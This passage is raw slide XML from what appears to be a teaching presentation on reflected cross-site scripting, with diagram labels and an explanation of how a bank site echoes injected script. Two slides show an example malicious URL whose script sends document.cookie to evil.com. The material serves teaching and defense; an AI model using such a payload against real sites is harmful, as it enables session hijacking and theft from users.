                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911225" y="2146808"/>
            <a:ext cx="1073785" cy="391160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159625" y="6278372"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Title 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08745409-D66C-4A43-B9A3-6BB91875AB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9E9D65E-AE62-E545-B867-A7EF26DD0332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>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6C61C9-B729-744B-B8CD-E29F7147BC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACC7D1B-75F9-4B49-B1A6-BD675397F575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8915400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example malicious URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>If user clicks this link:                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser goes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> returns:                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006B01"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser executes script in same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F03C014-666E-3F4D-9E7C-6D4E13101266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2209800"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="42744"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19049">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="78740" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="123825">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.com/search.php?term=</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" marR="1316990" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="117200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://evil.com/?cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= " +  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347220926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6C61C9-B729-744B-B8CD-E29F7147BC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACC7D1B-75F9-4B49-B1A6-BD675397F575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8915400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example malicious URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>If user clicks this link:                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser goes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> returns:                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006B01"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser sends to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the cookie  for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F03C014-666E-3F4D-9E7C-6D4E13101266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2209800"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="42744"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19049">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="78740" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="123825">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.com/search.php?term=</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1038225" marR="1316990" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="117200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"http://evil.com/?cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= " +  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
